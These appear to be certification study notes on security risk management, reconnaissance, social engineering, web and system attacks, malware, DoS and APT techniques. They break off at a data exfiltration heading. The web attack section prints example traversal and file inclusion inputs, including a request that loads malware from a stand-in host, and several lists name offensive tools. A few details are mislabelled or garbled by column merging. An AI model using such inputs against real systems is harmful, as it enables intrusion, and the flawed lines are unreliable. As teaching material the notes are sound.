Chapter 1

Assessing Information Security Risk

- Identify the importance of Risk Management

- Assess Risk
- Mitigate Risk
- Integrate Documentation into Risk Management
Elements of Cybersecurity (Endpoint Model)

a. Threats
b. Control
c. Assets
d. Exploit
e. Vulnerability
f. Attack

Elements of Cybersecurity (Perimeter Model)

a. Assets
b. Controls
c. Threats
d. Attack
e. Exploit
f. Vulnerability

The Risk Equation

Risk = Threats X Vulnerabilities X Consequences

Risk Management

- Management of risk involves assigning weight for different contexts.

- High risk with few consequences may not warrant much effort.
- Low risk with significant consequences may warrant a different approach.
- You can communicate technical risk to decision makers.
- Risk is necessary – without risk, the organization would cease to function.
- Many risks are worth taking, as long as the reward is greater.
Importance of Risk Management or its cycle

- Identification, Assessment, Analysis, Response.

ERM

- The comprehensive process of evaluating, measuring, and mitigating risk in an organization to achieve pre-
defined business objectives.
- Enterprise systems are often functional on a 24/7 basis.
- Very complex; a challenge to secure enterprise resources.
- Numerous ways in which people can intentionally or unintentionally compromise business operations.
- ERM is vital to achieving objectives in any enterprise.
Reasons to Implement ERM

- To keep confidential customer information out of the wrong hands.

- To keep trade secrets private.
- To avoid financial losses due to damaged resources.
- To avoid legal issues.
- To maintain a positive public perception of the enterprise’s brand/image.
- To ensure the continuity of operations and remain a contender in the marketplace.
- To establish trust and liability in business relationships.
- To meet stakeholders’ objectives.

Risk Exposure
- The property that indicates how susceptible an organization is to loss.
- Can be quantified as a product of the probability that an incident will occur and the expected impact, or loss,
if it does.
- Risk cannot be totally avoided, but ignoring exposure will hurt your business.
Risk Analysis Methods

- Can be qualitative, Semi-quantitative, and Quantitative.

 Risk Facing an Enterprise ESA Frameworks
- Legal - ESA is a framework used to define the baseline, goals, and methods used to
- Financial secure the business.
- Physical assets - An ESA can:
- Intellectual property o Assess risk and quantify threats to the organization.
- Infrastructure o Then mitigate each threat, vulnerability, or risk.
- Operations o Save an organization from losing time, money, and resources.
- Reputation o Provide a roadmap by identifying the risk that pose the greatest liability.
- Health

ESA Framework Assessment Process

The NIST Framework and Models

- National Institute of Standards Technology or NIST

- Has secure-related publications.
- Special Publication (SP) 800-14:
o Generally Accepted Principles and Practices for Securing Information Technology Systems
o Provides a comprehensive information assurance framework directed to all personnel in an
organization.
o Proposes several generally accepted systems security principles.
o Describes common IT security practices.

The COBIT Frameworks ITIL

- Control Objectives for information and Related - Information Technology Infrastructure Library
Technology or COBIT - Originally developed by the UK Government’s Central
- Created by ISACA, initially in 1996. Computer and Telecommunications Agency (CCTA) in
- COBIT 5 released in 2012. the 1980s
- Principles: - Comprehensive set of IT management publications of
o Meeting stakeholders needs. the 2011 edition include:
o Covering the enterprise end-to-end o ITIL Service Strategy
o Applying a single, integrated framework o ITIL Service Design
o Enabling a holistic approach o ITIL Service Transition
o Separating governance from o ITIL Service Operations
management o ITIL Continual Service Improvement
 The SABSA Framework
The ISO Model
- Sherwood Applied Business Security Architecture.
- First International standard for information
- Based on the Zachman Framework.
technology management based on BS 15000
- Risk-based approach to implement security that
standard developed by BSI.
upholds business objectives.
- ISO/IEC 20000 published 2005.
- Layers:
- ISO/IEC 27001 published in 2013.
o Contextual, Conceptual, Logical, Physical,
- Provides comprehensive guidance on
Component, Operational
information assurance principles and
- Questions?
processes.
o What? Why? How? Who? Where? When?

TOGAF System-Specific Risk Analysis

- The Open Group Architecture Framework - Analyze how systems are used.
- High-level strategies for securing various - How can the systems’ CIA be threatened?
dimensions of an architecture. - Your analysis will depend on each system’s
- Based on DoD’s TAFIM context.
- Architecture domains: - Ask questions such as:
o Business, Applications, Data, Technical o How can an attack be performed?
- Each domains define tools, processes, and o Are there any patches or
procedures to secure the business. workarounds?
- Supports operational efficiency and a greater ROI. o How many targets are there?
o How likely is an attack?

Risk Determinations

- Likelihood of threat
o Motivation: What does an attacker stand to gain?
o Source: Who is the threat, and what is their experience?
o ARO: How often does the threat successfully affect the enterprise?
o Trend Analysis: How effective are emerging threats, and what do you know about them?
- Magnitude of Impact

AV (Asset Value) x EF (Exposure Factor) = SLE (Single Loss Expectancy)

SLE x ARO (Annual Rate of Occurrence) = ALE (Annual Loss Expectancy)

Documentation of Assessment Results Guidelines for Assessing Risk

- Who tasked you with the investigation? - Implement ESA.

- What were you tasked with? - Stay up to date on latest threats.
- What did you investigate? - Draft security agreements for partnerships.
- What did you do? - Conduct audits of outsourced assets.
- What did you find? - Conduct audits of your cloud providers.
- What does it all mean? - Assess risk before mergers.
- In a demerger, consider lost/shared assets.
- When integrating with businesses in other
industries, consider rules, polices,
- regulations, and geographic issues.
- Determine what a threat is, its origin, and risk.
- Calculate the threat's SLE and ARO.
- Document the assessment results.
Classes of Information

a. Public
b. Private
c. Restricted
d. Confidential

Classification of Information Types into CIA Levels

a. Integrity
b. Availability
c. Confidentiality

Security Control Categories

a. Technical
 Hardware or software that prevents and mitigates threats to computers.
 Example: A network firewall
b. Physical
 Measures that restrict, detect, and monitor access to physical areas or assets.
 Example: Door locks
c. Administrative
 Monitor organization’s adherence to security policies.
 Example: A regular scheduled compliance audit

CVE

- A public dictionary of vulnerabilities using CVSS.

- Enables vulnerability data sharing between organizations.
- Maintained by MITRE Corporation.
- Entries include:
o An identifier in the format CVE-YYYY-####
o A description.
o URL references for more info.
o The data the entry was created.
Extreme Scenario Planning and Worst Case Scenarios

- Extreme Scenarios:
o Total DoS of network or systems.
o Theft of encryption keys.
o Theft, tampering, or destruction of trade secrets.
o Theft, tampering, or destruction of financial data.
o Theft, tampering, or destruction of national secrets.
o Total loss of systems through natural disasters.
- Strategies:
o Gather intelligence to identify threats that can instigate extreme scenarios.
o Identify the motivations of these threats.
o Identify the skill level of these threats.
o Identify what vectors these threats can take.
o Determine what assets in your organization are the most critical and susceptible to extreme
scenarios.
o Determine controls that will help prevent or mitigate an extreme scenario.
o Identify what exactly you risk by failing to prevent an extreme event.

Risk Response Techniques

1. Avoid
o Eliminate risk by eliminating the source.
2. Transfer
o Move responsibility to third party.
3. Mitigate
o Reduce risk controls and countermeasures.
4. Accept
o Determine that risk is within the organization’s appetite and do nothing further.
Additional Risk Management Strategies

Identify exemptions – Legacy systems may be exempt from specific risk processes. Newer systems may change
this, bringing on new risk, so you need to account for these exemptions.

Use deterrence – The process of influencing a threat’s decision to exploit or not exploit a risk.

Identify inherent risk – Risk that an event will pose if no mitigating controls are put in place. Helps you
determine which controls to put in place.

Identify residual risk – Risk that remains after controls are put in place. Helps you determine the effectiveness
of controls.

Control Monitoring and Improvement

- Organizations need to recurring process to adapt to changes based on risk.
- Continuous monitoring will constantly detect changes, and improvement will address them.
- Software tools can automate this process.

IT Governance

- Stakeholders ensure that IT resources align to objectives and add value.

- Also seeks to mitigate risk of technology.
- Stakeholders expect a certain level of risk management and mitigation.
- Prepare to communicate how you measure, respond to, and mitigate risks.
- Evaluate  Direct  Monitor (Repeat)
Verification and Quality Control

Strategies:

Evaluation/assessment – Identify the state or products and services to spot problem areas and suggest remediation.
Auditing – Comparing state of products and services to an established baseline to identify violations that require
remediation.

Maturity Model Implementation – Reviewing organization against expected goals and ascertaining level of risk based
on this. Can help guide risk management strategies.

Certification – Considering a product or service to have met all requirements after extensive tests. Assures
stakeholders that a product or service is of sufficient quality, reducing risk.

Defense in Depth Guidelines of Mitigating Risks

- Categorize information.
- Classify information in terms of CIA.
- Incorporate stakeholder input for CIA-based
decisions.
- Understand technical controls in terms of CIA.
- Create aggregate CIA scores.
- Plan for worst case scenarios.
- Avoid, transfer, mitigate, or accept risk.
- Identify exemptions and inherent and residual risk.
- Use deterrence techniques where mitigation fails.
- Implement continuous monitoring.
- Communicate risk response to relevant stakeholders.
- Conduct verification and quality control processes.
- Adopt a defense in depth strategy.

From Policy to Procedure Topics to include in Security Policies and Procedures

- The scope of what the policy covers.

- How information is classified.
- Goals for secure handling of information.
- How other management policies relate to the
security policy.
- References to supporting documents.
- Specific instructions for handling security issues.
- The person or group who has specific designated
responsibilities.
- Known consequences for security policy non-
compliance.

Best Practices to Incorporate in Security Policies and Procedures

- Forensics
- Employment and Termination
- Continuous Monitoring
- Training and Awareness
- Auditing
Types of Policies

Acceptable use policy – define rules and restrictions for behavior. Behavior may reduce, increase, or have no effect
on risk.

Account management policy – define admin responsibilities for identity security. How user identity is created,
altered, and deleted.

Password policy – define the rules for generation and maintenance of credentials. Set restrictions like minimum
length, complexity, reset time, etc.

Data ownership policy – define how data is assigned to certain personnel. Owners are responsible for the data’s
security.

Data classification policy – outline how data sensitivity is categorized. Organizations can triage security based on
data classifications.

Data retention policy – define how and when data is stored/purged. PiI and PHI are often subject to legal/regulatory
compliance.

Patching – fixes new vulnerabilities that are discovered every day. May need steps to test patches before pushing
them out.

Compensation control development – mitigates risk when primary control fails. Can also support primary controls by
improving their efficacy.

Control testing procedures – tests can also evaluate planned or existing controls. Should be performed continuously;
not just once.
Remediation planning – steps to remove or suspend a system from production. Can include steps to remediate the
problem directly.

Exception management – exceptions arise when standard remediation doesn’t work. Plan must instruct security
personnel on best course of action.

Evidence production – support forensic investigation process after an incident. Evidence must uphold integrity and
authenticity.

Guidelines for Integrating Documentation into Risk Management

- Download free policy templates.
- Consider hiring a consultant.
- Use direct, concise language.
- Include business leaders in policy development.
- Support policies with clearly defined processes and procedures.
- Make processes and procedures easy to follow.
- Compare and contrast policies, processes, and procedures with those of other organizations.
- Consider policies, processes, and procedures to be living documents.
- Incorporate best practices into your policies based on your specific enterprise requirements.
- Involve HR, legal counsel, management, and other entities in the policy development process.
- Ensure that policies have provisions for legal and regulatory compliance.
- Identify any sensitive Pll that your organization handles.
- Be up front with your clients as to how their PII will be used.
- Advise your clients on best practices to maintain privacy.
- Draft a BCP to maintain day-to-day operations in the event of an incident.
- Define in the BCP what components are at risk and how they should be preserved.
- Review your BCP and test it on a regular basis.
Chapter 2
Analyzing Reconnaissance Threats to Computing and Network Environments

- Assess the Impact of Reconnaissance Incidents

- Assess the Impact of Social Engineering

Footprinting – using public tools to gather intel on target’s technology, personnel, and structure.

Scanning – using specialized tools to discover hosts and services running on a network.

Enumeration – mapping the network as a whole.

Footprinting Methods

- Using Whois and SEC info to determine IP, names, emails, phone numbers, etc.
- Dumpster diving to find key company info to use in social engineering.
- HTML code of an organization's web page can provide web server info.
- Mining social media sites like Facebook and LinkedIn for organizational info.
- Using search engines to reveal domain info about targeted web apps.
- Using metadata analysis tools to search for hidden info in public files.

Network and System Scanning Methods

- Look for open ports.

- Look for network access points.
- Find applications that are listening on certain ports.
- Discover vulnerabilities in web app infrastructure.
- Discover network ranges.
- Identify the operating environment of network hosts.
- Scan network and system logs.
- Scan ACLs.
Enumeration Methods

- Querying DNS servers for unsecured info about network infrastructure.

- Enumerating SNMP devices on a network.
- Discovering a host's NetBIOS name to identify the host.
- Establishing a NetBIOS null session to connect to a remote host without credentials.
- Enumerating domain directories like Active Directory.
- Enumerating web server applications.
- Fingerprinting hosts to determine their operating systems.

Variable Affecting Reconnaissance

1. Wireless vs. Wired

- Wired may limit reach of sniffing unless attacker is able to forwards traffic to their host.
- Wireless is often encrypted, preventing attackers from reading packet contents.
2. Virtual vs. Physical
- Virtual systems can foil an attacker but can still reveal infrastructure information.
- Physical access is easier and more fruitful in certain networks.
3. Internal vs. External
- Insiders know a great deal already, but additional recon may be traced back to them.
- External actors must work harder for recon but can more easily maintain anonymity.
4. On-premises vs. Cloud
- On-premises systems can be more vulnerable, but organization retains control.
- Cloud providers may offer better security but are still big targets.
Evasion Techniques for Reconnaissance

- Obfuscating network packets to prevent NIDS from matching packets' signatures.

- Fragmenting activity into multiple packets to fool less advanced NIDS.
- Allowing reconnaissance traffic to be encrypted and therefore unreadable to NIDS.
- Initiating a DoS on the NIDS to render it useless.

Reconnaissance Tools

1. Footprinting
- Whois, nslookup, dig, Netcraft, FOCA, Maltego
2. Scanning
- Nmap, ping, tracet, netstat, Netcat, Snort, Vega
3. Enumeration
- Nmap, Nessus, snmpwalk, snmputil, nbtscan, Cain & Abel

Social Engineering

- Deceiving people into giving away access or information.

- Performing a confidence trick on privileged targets.
- Information obtained can be used to plan a larger attack.
- Social engineers can avoid technical defenses entirely.
- One of the most common and effective attacks.
- Undermines basic human trust, often by posing as an authority figure.
- Victim believes the facade, and the attacker capitalizes.

Types of Social Engineering

1. Impersonation – pretending to be someone else. Successful when personal identity is hard to establish.
2. Hoax – tricking user into performing undesired actions based on a lie.
3. Phishing – attacker sends an email claiming to be from a reputable source to get user to reveal sensitive info.
4. Spear phishing – is phishing targeted at specific individuals.
5. SMiShing – uses SMS text messages.
6. Pharming – tricks users into visiting a spoofed website infected with malware.
7. Whaling – spear phishing that target wealthy individuals or groups.
8. Vishing – using telephony to engage in phishing practices.
9. Baiting – planting compromised physical media where someone will find it and use it.
10. URL hijacking – exploiting users’ typos while they enter a URL. Typo URL redirects to malicious site.
11. Spam – is flooding a target’s email with advertisements.
12. Spim – does this over instant messaging.
13. Shoulder surfing – looking over a user’s shoulder while they enter credentials.
14. Dumpster dividing – reclaiming information from items disposed of in trash containers.
15. Tailgating – attacker slips in through a secure area following an unaware employee.
16. Piggybacking – similar to tailgating but employee is aware someone is following behind. Employee may or may
not know attacker.

Phishing and Delivery Media

- Email, Electronic postcards, Instant messaging, Text messaging, Social networking sites, QR codes.

Phishing and Common Components

- Spoofing messages, Rogue domains, Malicious, links, Malicious attachments.

Social Engineering for Reconnaissance

- Impersonating an employee to obtain key personnel information.

- Probing for network information in a bogus job interview.
- Crafting fake social networking profiles to gain access to personal employee info.
- Tailgating into an entrance to observe an organization's physical security.
- Baiting an employee into plugging in a "lost" USB drive that enumerates the network.

Chapter 3
Analyzing Attacks on Computing and Network Environments

- Assess the Impact of System Hacking Attacks

- Assess the Impact of Web-Based Attacks
- Assess the Impact of Malware
- Assess the Impact of Hijacking and Impersonation Attacks
- Assess the Impact of DoS Incidents
- Assess the Impact of Threats to Mobile Security
- Assess the Impact of Threats to Cloud Security

System Hacking

Start with a goal  Plan the attack  Perform reconnaissance  Identify potential
vulnerabilities  Exploit vulnerabilities  Cover tracks

4. Start with a goal 1. Identify potential vulnerabilities

- Specific intent - Match discovered software with
- Non-specific intent; decision based CVE entries.
on vulnerabilities. 2. Exploit vulnerabilities
5. Plan the attack - Start or stop services.
- Operating system - Hide the attack.
- Server application - Dig further.
- Support systems and applications - Load malware
- Other servers - Modify site to send sensitive data
- Other applications back to attacker.
6. Perform reconnaissance - Use server to launch other attacks.
- Footprinting, scanning, - Deface data on the site.
enumeration 3. Cover tracks
- Website crawling - Eliminate traces of the attack
- Google URL searches - Evade forensics
- Public sites, tools, info sources - Remove all evidence that identifies
- Social engineering, dumpster attacker
diving, network scanning
- Identification of software versions

Password Sniffing

- Monitoring a password for data transmitted over a network.

- Problematic when passwords are transmitted in plaintext.
- Using open Wi-Fi without encryption protocols is a huge target.
- Transmissions with encryption like SSH or SSL/TLS can halt sniffing attempts.
- Organizations may segment networks and sniffers may be exposed to less as a result.
- Sniffers placed in key points in the network can capture more traffic.
Password Cracking

Brute-force – tries all possible permutations of random characters. Resource- and time-intensive. Best used for short
passwords.

Dictionary – uses words from a precompiled list. Usually faster than brute-force. People often use real words or
variations.

Hybrid – uses both brute-force and dictionary methods. Modifies wordlist to add random or substitute characters.
Faster than brute-force, slower than dictionary.

Rainbow table – a file that includes pre-computed passwords and their hashes. Drastically reduces time needed to
crack passwords. Infeasible against strong hashing algorithms and algorithms using cryptographic salts.

Privilege Escalation

Vertical – user can perform functions not normally assigned to their role
or explicitly permitted. Example: Normal users gains access to admin
rights.

Horizontal – user can access or modify specific resources they are not
entitled to. Example: Normal user gains access to other users’ private
data.

System Hacking Tools and Exploitation Frameworks

Password Sniffers

- Wireshark, Cain & Abel, tcpdump, Kismet, Ettercap, Microsoft Message Analyzer, Nagios Network Analyzer
Password Crackers

- John the Ripper, Cain & Abel, THC Hydra, pwdump, Ophcrack, Medusa, Ncrack
Exploitation Frameworks

- Metasploit Framework, Core Impact, CANVAS, W3af, BeEF

Client-Side vs. Sever-Side Attacks

Client-Side – targets users who access resources from a web server. Often depends on social engineering to trick
user. Example. User tricked into selecting a button, which executes malicious JavaScript on their browser.

Server-Side – targets computers that host data. Attacks can manifest on the client but are localized on the server.
Example: Attacker injects malicious code into a web app; any client who loads the web app could be compromised.

XSS

Stored attack – attacker injects malicious code into website forums or other data. Users views the with the malicious
code is attacked.

Reflected attack – attacker crafts a malicious request to send to a legitimate server. Attacker sends link to victim,
victim click it, and script is reflected off the server.

DOM-based attack – malicious scripts not sent to server at all. Attack takes advantage of JavaScript to execute solely
on client side.
XSRF

SQL Injection

- SQL is a common database language.

- Attacker modifies SQL queries to execute malicious actions in web app.
- Attacker can use apostrophe and wildcard characters maliciously.
- Attacker can select, insert, delete, and update data.
- Attacker tests all inputs to identify injection vulnerabilities.
Directory Traversal

- Accessing files from a location the user is not authorized to access.

- Attacker send a command request to do the backtracking:
o ..\ for Windows and Unix-like OS
o ../ for Windows OS
- Attacker can execute any command on the system if the app has the right privileges.
- Attacker can encode traversal commands to get around filtering:
o %2E = .
o %2F = /
o %2E%E2F = ../
- Examples GET request for accessing Windows command prompt:
o ../../Windows/system32/cmd.exe (non-encoded)
o %2E%2E%2F%2E%2E%2F/Windows/system32/cmd.exe (encoded)
File Inclusion

- The attacker adds a file to a running web app or website.

- File is malicious or manipulated for malicious purposes.
- Can lead to:
o Malicious code execution (client and server)
o Data theft
o DoS
- Remote (RFI):
o Executes script to include external file.
 o Lack of proper input validation makes web software vulnerable.
o Example of calling a malicious external PHP file:
/webpage.php?FONT=http://www.malice.example/malware
- Local (LFI):
o Executes script to include file already on web server.
o Often used with directory traversal and null character to access non-PHP files.
o Example of executing command prompt on server:
/webpage.php?FONT =.. / .. /Windows/system32/cmd.exe%00
Additional Web Application Vulnerabilities and Exploits

Session fixation - attacker forces a known session onto targeted users. Attacker can provide alternate inputs in GET
requests. Attacker can execute XSS to set session cookie directly. Attacker identifies weakness in session token
generation.

Session prediction - attacker identifies weakness in session token generation. Attacker predicts future values and
takes over new session. Attacker tricks client into clicking a link that goes somewhere else.

Clickjacking - attacker tricks client into clicking a link that goes somewhere else. Can redirect user to malicious site.
Made possible by iframes that hide content.

Cookie hijacking – attacker injects malicious code to take control of cookie. Attacker hijacks session and can initiate a
DoS.

Cookie poisoning – attacker modifies cookie contents after generation. Modified cookie can exploit web app
vulnerabilities.

Web Services Exploits

Probing - attacker tests which requests a service is vulnerable to. Attacker uses this info to craft requests that reveal
vulnerabilities.

Coercive parsing - attacker modifies SOAP XML-based requests. Attacker can craft payload to trigger DoS conditions.

External references - attacker can exploit SOAP that allows third party XML. Attacker can corrupt XML schema to
initiate DoS or modify data.

Malware – XML messages can include malicious software. Executes compressed files, documents can include
malicious macros.
SQL Injection - SQL statements should not be transmitted over SOAP. Attacker could compromise the CIA of database
records.

Web-Based Attack Tools

- Sqlmap, Metasploit Framework, Burp Suite, OWASP WebScarab, OWASP ZAP, w3af, BeEF, Nikto, Paros Proxy

Malware Categories
1. Virus – replicate with user action. Attaches to files.
2. Worm – self-replicating. Does not attach to files.
3. Adware – displays unwanted advertisements.
4. Spyware – secretly collects data.
5. Trojan horse – hidden control program. Does not replicate or attach to files.
6. Rootkit – controls system at lowest levels. Runs invisibly.
7. Logic bomb – triggered by a specific event.
8. Ransomware – restricts access to system of data. Demands ransom to unlock access.
9. Malvertisement – malicious code delivered through ads. Carried in dynamic web content.
Spyware

- Adware can carry spyware or other malicious code.

- Adware can reduce productivity and be an annoyance.
- Spyware can collect:
o Browsing history
o PII
o Bank info
o Credentials
- Spyware can come packaged with otherwise legitimate software.
- Effective spyware and adware are designed to have little impact on performance.
- Some spywares can bypass anti-malware solutions.
Malware Tools

- NetBus, Sub7, Back Orifice, Zeus, FinFisher, MPack, RCS

Spoofing – software-based attack designed to assume an identity.

Impersonation – human-based pretending to be someone else.

Session hijacking – exploiting a computer during an active session.

Session Hijacking
- Over the Internet, session hijacking involves stealing a session cookie.
- Stolen cookie enables attacker to control the session.
- Attacker can sniff for session cookies over unsecured Wi-Fi.
- XSS attacks can use malicious code to steal cookie from victim's browser session.
- Session hijacking can be used in a DoS of client and/or server.
- Session hijacking can also enable man-in-the-middle attacks.

Hijacking and Spoofing Tools

Spoofing:

- hping, Nmap, Cain & Abel, Ettercap, Nemesis

Session hijacking:

- CookieCatcher, DroidSheep, CookieMonster

DoS Attacks

- Attacker attempts to disrupt or disable systems that provide services.

- Done through various mean. Examples:
o Flooding a network link with data to consume bandwidth.
o Sending data that exploits application flaws.
o Sending multiple service requests to consume resources.
o Flooding email messages cause legitimate email to bounce back.

DoS Attack Techniques

Dos Attack Type

ICMP flood - sending large amount of pings to target. Also called ping floods and Smurf attacks.

UDP flood – sending large amount of UDP pings to target. DoS condition usually happens on spoofed source IP.

SYN flood – attacker sends SYN message with spoofed IP source. Target responds to invalid IP with SYN-ACK. Memory
for reply remains open, and the server is flooded with requests.
Buffer overflow - Too much data sent to fixed-length memory buffer. Adjacent areas of memory are overwritten.
Service may not respond or may not function properly.

Reflected DoS attack - Attacker forges source IP and sends request to large number of systems. All systems respond
to forged IP, causing the target to crash. NTP reflection and DNS amplification are examples.
Resource exhaustion – application does not properly restrict access to resources. Attacker consumes bandwidth or
CPU time, stopping the app.

Permanent DoS attack – Attackers target hardware to cause outage not easily recovered from. Victim must repair or
replace hardware. Also called phlashing.

DoS Evasion Techniques

- Maintaining botnets is a lucrative operation for attackers.

- Botnets can take out even the most hardened systems.
- Difficult to separate legitimate from malicious traffic.
- Attackers can generate traffic organically.
- Slashdot effect - thousands and thousands of users follow a link.
- The server can't handle the traffic and is taken down.

DoS Tools

- HOIC, LOIC, XOIC, OWASP HTTP Post Tool, DDOSIM, RUDY, Slowloris, PyLoris, Tor's Hammer, HULK

Trends in Mobile Security

- The organization's wireless infrastructure must address the rise in mobile device usage.
- BYOD is a significant trend that impacts many organizations.
- BYOD raises a whole host of security and legal challenges.
- Hard to account for risks when the devices are out of your control.
- Some organizations ban BYOD, but this isn't always feasible.

Wireless Threats
- Cracking wireless password through online password attacks.
o Attackers can use brute force or use a wordlist against weak wireless security.
- Even WPA2 is vulnerable if combined with WPS.
o WPS enrolls devices with an 8-digit PIN that is easy to crack.
- Wireless infrastructure is also a big target for attackers.
o Attackers can DoS poorly configured networks.
o They can also break into ones that "leak" wireless signals beyond the premises.
- Attackers also target clients.
o Wireless clients are easier to compromise physically.
o Physical compromise is a vector to wider-reaching network compromise.

BYOD Threats
De-perimeterization - Shifting or reducing the organization's boundaries. Work done in the office may leave the
office. Poorly secure devices may fall into the wrong hands.

Unpatched and insecure devices – Devices may be running outdated software or have no anti-malware. Malware can
spread throughout the network once device connects.

Strained infrastructure – many devices can grind the network to a halt, causing DoS.
Forensic complications – including personal devices in an investigation may be difficult or impossible.

Lost or stolen devices – unencrypted data on lost or stolen devices is open to compromise.

Mobile Platform Threats

Android – Larger number of devices to target. Many users run older OS versions with unpatched vulnerabilities. Third
party apps can include malware.
IOS – Malware targets jailbroken devices that remove restrictions. Masque attack installed through third party source
spoofed legitimate apps.

Windows 10 Mobile – much less market share than Android and iOS, so less targeted. Windows Store not as tightly
controlled, so malware is more likely to be hosted within this official channel.

Mobile Infrastructure Hacking Tools

- AnDOSid, Spooftooph, DriodBox, APKInspector, Androrat, Burp Suite

Cloud Infrastructure Challenges

- A minor breach at a cloud provider can net an attacker something of value.

- Lack of proper authentication and authorization in the cloud increases risk.
- Use of third-party APIs can compromise link between customer and provider.
- Cloud infrastructure enables attackers to borrow computing power for attacks.
- Virtualized environments make forensic analysis difficult.
- Attackers can run different components of attack on different platforms, making them difficult to detect or
track.

Threat to Virtualized Environments

Virtual Threat

VM escape – attacker executes code to escape VM and interact with hypervisor. Attacker could gain access to
underlying host OS and other VMs.
Privilege elevation – attack could access host machine and execute administrator actions.

Live VM migration exploitation – VMs need to be physically moved without service interruption. Attackers can hijack
the migration process without security control.
Data remnants – Remnants are leftover data on storage media. Data deleted on VM may not be truly gone. Primarily
a concern during de-provisioning process.

Threats to Big Data

- Big data is large, complex data too big for traditional management tools.
- Existing architecture may need to be restructured to keep up with big data.
- Big data presents certain challenges to security.
- Breach of privacy
o A large store of personal data may net an attacker more info in one attack.
- Privilege escalation
o Users may be able to view data they are not authorized to, threatening confidentiality.
- Repudiation
o Size of big data makes monitoring difficult, so an attacker could deny having changed data.
- Forensic complications
o Big data often lacks consistent structure, making securing and collecting data sets difficult.

Chapter 4
Threats to Big Data

- Assess Command and Control Techniques

- Assess Persistence Techniques
- Assess Lateral Movement and Pivoting Techniques
 - Assess Data Exfiltration Techniques
- Assess Anti-Forensic Techniques

Command and Control

- Infrastructure of computers used to direct, distribute, and control malware.

- Attackers use a coordinate system of botnets and issue commands to zombies.
- Commands can be everything from a heartbeat to an infection directive.
- C&C servers are difficult to track because of dynamic DNS registration.
- Each device in an organizational network is a potential attack surface for the C&C.
- Attackers must issue commands over a chosen channel.

IRC
- IRC is a group communication protocol.
- Also allows for private messages and file sharing.
- Historically the most common C&C channel.
- Easy to set up, and infrastructure allows full interactive control through commands.
- Example: C&C server could force IRC clients to download malicious software.
- Use is on the decline; many admins block IRC traffic altogether.

HTTP/S

- Can't be feasibly blocked like IRC; hard to separate legit from malicious traffic.
- Not as flexible as IRC without building up server backend.
- Still can be used to distribute C&C messages.
- Example: uploading text files to web servers that trigger malware downloads.
- Attackers adapt to domain blocking by changing domains frequently.

DNS

- DNS traffic not usually inspected or filtered.

- Queries with C&C messages are longer and more complex, but must fit DNS format.
- Not as flexible as IRC, but still exploited where name servers aren't monitored.
- Queries broken into chunks to evade monitoring.
- Repeated queries may indicate bots checking into control server.
- Bot doesn't need direct connection to outside; it can resolve to a local DNS server that performs lookups
outside.

ICMP
- Bots can ping C&C controller to ask for orders; controller can respond.
- Transmission done in single ICMP packet.
- Packets are small, so most common use is to check a bot's status.
- File transfer and shell commands are difficult, but possible.
- Attackers may use ICMP because it's not usually thought of as a C&C vector.
- Reasons that might dissuade an attacker:
o Many admins block ICMP altogether.
o Admins may set a baseline size for ICMP packets that C&C messages exceed.
o ICMP packets are not encrypted and therefore easily inspected.

C&C Channel

Social media websites - Attacker can blend in with the crowd. Issues commands through messaging or profiles.
Facebook, LinkedIn, and Twitter have all been used for C&C.

Media files - Media file formats use metadata to describe the media. Attacker can embed control message in media
file. Scanners don't usually monitor media metadata.
XML-based documents - Modern Office documents use XML for better functionality. Attackers can embed control
messages in the XML. Like media, scanners won't always detect document messages.

P2P network - Normal C&C is centralized and a single point of failure. P2P is decentralized; control distributed
amongst many peers. If one or more peers is taken out, botnet can still function. P2P networks are hard to establish.

Cloud services – Attackers use free or cheap cloud resources to operate C&C. Attackers used App Engine to host an
app sending C&C messages. Cloud services have reliable, scalable infrastructure for attackers to exploit.

Advanced Persistent Threat

- A stealth threat that continually exploits a target.

- Targets organizations that store PII.
- Also targets nations for political reasons.
- Usually groups of technical people, not individual hackers.
- "Advanced" implies sophisticated knowledge of a system or network.
- APT crafts custom exploits that are difficult to detect or defend against.
- APT also combines multiple attack types into a larger threat architecture.
- Most APTs are used to maintain access.
- APTs can go months or even years without being detected.

Rootkits

- Exist at low level and conceal malicious code - perfect for APT.
- Can mask pretty much any activity on a system.
- Can take over core parts of OS to hide running processes, services, files, etc.
- Trojan horse may evade a scan because the rootkit changes the OS to hide it.
- APTs use rootkits to hide keyloggers, malware drivers, bot controllers, and backdoors.
- Often installed by privileged users who have been socially engineered.
- Difficult to detect and remove because the OS itself is now untrusted.
- Anti-rootkit software exists but may not be adequate.

Backdoors

- Used to bypass authentication and gain access to a system.

- Software backdoors use remote control software.
- Enabled as part of rootkit behavior.
- APTs hide backdoor after an attack, using them sparingly to not tip off users.
- Backdoors can also be hardware-based.
- Supported by some vendors and governments.
- Anyone with access to secret knowledge can access the hardware backdoor.
- APTs with this knowledge have an advantage over security professionals.
Logic Bombs

- Automates the post-attack process on a target system.

- Nothing suspicious happens until condition is met.
- Triggered at a certain time or event.
- APT can use logic bombs as misdirection.
- The bomb might not go off until much later, evading long-term incident response.
- APTs use logic bombs with a number of different payloads, like backdoors.
- Data destruction is also a common payload.
- Example: Bomb wipes sensitive data on a drive after user logs in.

Rouge Accounts
- Rogue accounts avoid injecting malicious software on a host.
 - Compromised account is trusted by the OS.
- One account may get lost in the shuffle of hundreds, or thousands.
- APT can use rogue account to remote into system and cause harm.
- How APT creates or hijacks account can determine its privileges.
- Example:
o 1. User tricked into revealing privileged credentials.
o 2. APT uses credentials to create a new account.
o 3. Later, APT uses new account to cause damage on the system.
- Account creation and use is logged on most critical systems.
Lateral Movement

- Attacker moves from one part of a computing environment to another.

- Attacker gains entry at the perimeter, then can go deeper without being noticed.
- Lateral movement is often indistinguishable from legitimate traffic.
- Reconnaissance is a major technique of lateral movement.
- Attacker sweeps network for hosts and enumerates protocols, ports, etc.
- This tells the attacker where they are and where they can move to.
Remote Access Services

- Attacker opens a connection from one host to another.

- Protocols and services available influence how an attacker can move.
- Older protocols like Telnet may be limiting.
- Many need to be installed on the target first.
- Attackers can also use graphic remote access services like Windows Remote Desktop.
- WRD needs to be enabled on target but is more common on user workstations.
- Not all remote access services need to be enabled on the target.
WMIC

- Interface into WMI.

- WMI obtains management info and enables management of local and remote
- computers.
- Admin can write scripts to automate tasks like starting/stopping processes.
- Attacker can harness power of WMIC to compromise more hosts remotely.
- Attacker can also assume a user's identity to elevate privileges.
- WMIC can also be used for reconnaissance.

PsExec

- A remote access service.

- Easy setup; no need to install on target.
- Provides more advanced features than Telnet.
- A popular vector for post-attack movement.
- Attacker doesn't need a direct shell onto target.
- Attacker can use a script on their local machine to run on the remote target.
- PsExec can also use the SYSTEM account for elevated privileges.
Data Exfiltration

- Malicious transfer of data from one system to another.

